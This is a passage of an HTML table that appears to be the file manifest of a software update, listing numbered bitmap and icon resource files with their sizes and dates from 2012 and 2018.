applicable</td></tr><tr><td>4803.bmp</td><td>Not applicable</td><td>246</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>4804.bmp</td><td>Not applicable</td><td>246</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>4805.bmp</td><td>Not applicable</td><td>246</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>4806.bmp</td><td>Not applicable</td><td>246</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>4807.bmp</td><td>Not applicable</td><td>1,358</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>4808.bmp</td><td>Not applicable</td><td>246</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>4809.bmp</td><td>Not applicable</td><td>246</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>481.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>4810.bmp</td><td>Not applicable</td><td>5,752</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>4811.bmp</td><td>Not applicable</td><td>1,288</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>4812.bmp</td><td>Not applicable</td><td>4,326</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>4813.bmp</td><td>Not applicable</td><td>9,566</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>4814.bmp</td><td>Not applicable</td><td>4,272</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>4815.bmp</td><td>Not applicable</td><td>9,402</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>4816.bmp</td><td>Not applicable</td><td>112,856</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>4817.bmp</td><td>Not applicable</td><td>112,856</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>4818.bmp</td><td>Not applicable</td><td>150,056</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>4819.bmp</td><td>Not applicable</td><td>246</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>482.ico</td><td>Not applicable</td><td>766</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>4820.bmp</td><td>Not applicable</td><td>1,590</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>483.ico</td><td>Not applicable</td><td>3,774</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>484.ico</td><td>Not applicable</td><td>2,238</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>485.ico</td><td>Not applicable</td><td>1,406</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>486.ico</td><td>Not applicable</td><td>9,662</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>487.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>488.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>489.ico</td><td>Not applicable</td><td>318</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>49</td><td>Not applicable</td><td>528</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>49.ico</td><td>Not applicable</td><td>318</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>490.ico</td><td>Not applicable</td><td>1,406</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>491.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>492.ico</td><td>Not applicable</td><td>318</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>493.ico</td><td>Not applicable</td><td>1,406</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>494.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>495.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>496.ico</td><td>Not applicable</td><td>318</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>497.ico</td><td>Not applicable</td><td>318</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>498.ico</td><td>Not applicable</td><td>318</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>499.ico</td><td>Not applicable</td><td>318</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5</td><td>Not applicable</td><td>1,502</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5.ico</td><td>Not applicable</td><td>1,406</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5.jpg</td><td>Not applicable</td><td>2,285</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>50</td><td>Not applicable</td><td>16,314</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>50.ico</td><td>Not applicable</td><td>3,774</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>500.ico</td><td>Not applicable</td><td>2,462</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5000</td><td>Not applicable</td><td>1,100</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>5001</td><td>Not applicable</td><td>370</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5001.bmp</td><td>Not applicable</td><td>246</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5002</td><td>Not applicable</td><td>330</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5003</td><td>Not applicable</td><td>276</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>5004</td><td>Not applicable</td><td>472</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>5005</td><td>Not applicable</td><td>342</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>5006</td><td>Not applicable</td><td>368</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>5007</td><td>Not applicable</td><td>444</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>5007.bmp</td><td>Not applicable</td><td>246</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5008</td><td>Not applicable</td><td>850</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>5009</td><td>Not applicable</td><td>486</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>5009.bmp</td><td>Not applicable</td><td>1,334</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>501.ico</td><td>Not applicable</td><td>2,462</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5010</td><td>Not applicable</td><td>308</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>5010.bmp</td><td>Not applicable</td><td>246</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5011</td><td>Not applicable</td><td>712</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>5011.bmp</td><td>Not applicable</td><td>246</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5012</td><td>Not applicable</td><td>110</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>5012.bmp</td><td>Not applicable</td><td>246</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5013</td><td>Not applicable</td><td>600</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>5013.bmp</td><td>Not applicable</td><td>246</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5014.bmp</td><td>Not applicable</td><td>246</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5015.bmp</td><td>Not applicable</td><td>246</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5016.bmp</td><td>Not applicable</td><td>246</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5017.bmp</td><td>Not applicable</td><td>246</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5018.bmp</td><td>Not applicable</td><td>246</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5019.bmp</td><td>Not applicable</td><td>246</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>502.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5020.bmp</td><td>Not applicable</td><td>1,910</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>503.ico</td><td>Not applicable</td><td>1,406</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>504.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>505.ico</td><td>Not applicable</td><td>2,238</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5053</td><td>Not applicable</td><td>62</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>506.ico</td><td>Not applicable</td><td>9,662</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>507.ico</td><td>Not applicable</td><td>3,774</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>508.ico</td><td>Not applicable</td><td>766</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>509.ico</td><td>Not applicable</td><td>2,238</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>51</td><td>Not applicable</td><td>8,292</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>51.ico</td><td>Not applicable</td><td>2,238</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>510.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>511.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>512.ico</td><td>Not applicable</td><td>766</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>513.ico</td><td>Not applicable</td><td>2,238</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>514.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>515.ico</td><td>Not applicable</td><td>766</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>516.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>517.ico</td><td>Not applicable</td><td>318</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>518.ico</td><td>Not applicable</td><td>1,406</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>519.ico</td><td>Not applicable</td><td>2,238</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>52</td><td>Not applicable</td><td>104</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>52.ico</td><td>Not applicable</td><td>1,406</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>520.ico</td><td>Not applicable</td><td>766</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5200</td><td>Not applicable</td><td>440</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>5200.bmp</td><td>Not applicable</td><td>1,143</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5202</td><td>Not applicable</td><td>148</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>5203.bmp</td><td>Not applicable</td><td>726</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>521.ico</td><td>Not applicable</td><td>1,406</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>522.ico</td><td>Not applicable</td><td>3,262</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>523.ico</td><td>Not applicable</td><td>2,238</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>524.ico</td><td>Not applicable</td><td>766</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>525.ico</td><td>Not applicable</td><td>1,406</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>526.ico</td><td>Not applicable</td><td>318</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>527.ico</td><td>Not applicable</td><td>3,262</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>528.ico</td><td>Not applicable</td><td>2,238</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>529.ico</td><td>Not applicable</td><td>318</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>53</td><td>Not applicable</td><td>4,158</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>53.ico</td><td>Not applicable</td><td>9,662</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>530.ico</td><td>Not applicable</td><td>1,406</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>531.ico</td><td>Not applicable</td><td>766</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>532.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>533.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>534.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>535.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>536.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>537.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>538.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>539.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>54</td><td>Not applicable</td><td>3,194</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>54.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>540.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>541.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>542.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5424.bmp</td><td>Not applicable</td><td>94</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5425.bmp</td><td>Not applicable</td><td>94</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5426.bmp</td><td>Not applicable</td><td>94</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5427.bmp</td><td>Not applicable</td><td>94</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5428.bmp</td><td>Not applicable</td><td>94</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5429.bmp</td><td>Not applicable</td><td>94</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>543.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>544.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>545.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>546.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>547.ico</td><td>Not applicable</td><td>3,262</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>548.ico</td><td>Not applicable</td><td>3,262</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>549.ico</td><td>Not applicable</td><td>3,262</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>55</td><td>Not applicable</td><td>3,902</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>55.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>550.ico</td><td>Not applicable</td><td>3,262</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5500.bmp</td><td>Not applicable</td><td>238</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5501.bmp</td><td>Not applicable</td><td>238</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>551.ico</td><td>Not applicable</td><td>3,262</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>552.ico</td><td>Not applicable</td><td>3,262</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>553.ico</td><td>Not applicable</td><td>3,262</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>554.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5540.bmp</td><td>Not applicable</td><td>246</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5541.bmp</td><td>Not applicable</td><td>85,934</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5542.bmp</td><td>Not applicable</td><td>7,402</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>555.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>556.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>557.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>558.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>559.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>56</td><td>Not applicable</td><td>16,406</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>56.ico</td><td>Not applicable</td><td>1,406</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>560.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5600.bmp</td><td>Not applicable</td><td>126</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5601.bmp</td><td>Not applicable</td><td>126</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>561.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5610.bmp</td><td>Not applicable</td><td>758</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>562.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5620.bmp</td><td>Not applicable</td><td>2,204</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>563.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>564.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>565.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>566.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>567.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>568.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>569.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5699.bmp</td><td>Not applicable</td><td>246</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>57</td><td>Not applicable</td><td>10,050</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>57.ico</td><td>Not applicable</td><td>1,150</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>570.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5700.bmp</td><td>Not applicable</td><td>246</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5701.bmp</td><td>Not applicable</td><td>246</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5702.bmp</td><td>Not applicable</td><td>246</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5703.bmp</td><td>Not applicable</td><td>246</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5704.bmp</td><td>Not applicable</td><td>246</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5705.bmp</td><td>Not applicable</td><td>310</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5706.bmp</td><td>Not applicable</td><td>334</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5707.bmp</td><td>Not applicable</td><td>334</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5708.bmp</td><td>Not applicable</td><td>502</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5709.bmp</td><td>Not applicable</td><td>1,598</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>571.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5710.bmp</td><td>Not applicable</td><td>46,514</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5711.bmp</td><td>Not applicable</td><td>246</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5712.bmp</td><td>Not applicable</td><td>246</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5713.bmp</td><td>Not applicable</td><td>822</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5714.bmp</td><td>Not applicable</td><td>822</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5715.bmp</td><td>Not applicable</td><td>822</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5716.bmp</td><td>Not applicable</td><td>822</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>572.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>573.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>574.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>575.ico</td><td>Not applicable</td><td>894</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>576.ico</td><td>Not applicable</td><td>766</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>577.ico</td><td>Not applicable</td><td>318</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>578.ico</td><td>Not applicable</td><td>3,774</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>579.ico</td><td>Not applicable</td><td>2,238</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>58</td><td>Not applicable</td><td>10,930</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>58.ico</td><td>Not applicable</td><td>1,662</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>580.ico</td><td>Not applicable</td><td>1,406</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5800.bmp</td><td>Not applicable</td><td>19,138</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5801.bmp</td><td>Not applicable</td><td>20,902</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5802.bmp</td><td>Not applicable</td><td>17,638</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>581.ico</td><td>Not applicable</td><td>9,662</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>582.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>583.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>584.ico</td><td>Not applicable</td><td>318</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>585.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>586.ico</td><td>Not applicable</td><td>318</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>587.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>588.ico</td><td>Not applicable</td><td>766</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>589.ico</td><td>Not applicable</td><td>318</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>59</td><td>Not applicable</td><td>308</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>59.ico</td><td>Not applicable</td><td>766</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>590.ico</td><td>Not applicable</td><td>2,238</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5900.bmp</td><td>Not applicable</td><td>39,474</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>591.ico</td><td>Not applicable</td><td>1,406</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>592.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>593.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>594.ico</td><td>Not applicable</td><td>766</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>595.ico</td><td>Not applicable</td><td>318</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5950.bmp</td><td>Not applicable</td><td>822</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5951.bmp</td><td>Not applicable</td><td>822</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5952.bmp</td><td>Not applicable</td><td>822</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5953.bmp</td><td>Not applicable</td><td>822</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5954.bmp</td><td>Not applicable</td><td>23,144</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5955.bmp</td><td>Not applicable</td><td>22,872</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>5956.bmp</td><td>Not applicable</td><td>35,574</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>596.ico</td><td>Not applicable</td><td>3,774</td><td>18-Jan-2018</td><td>06:15</td><td>Not 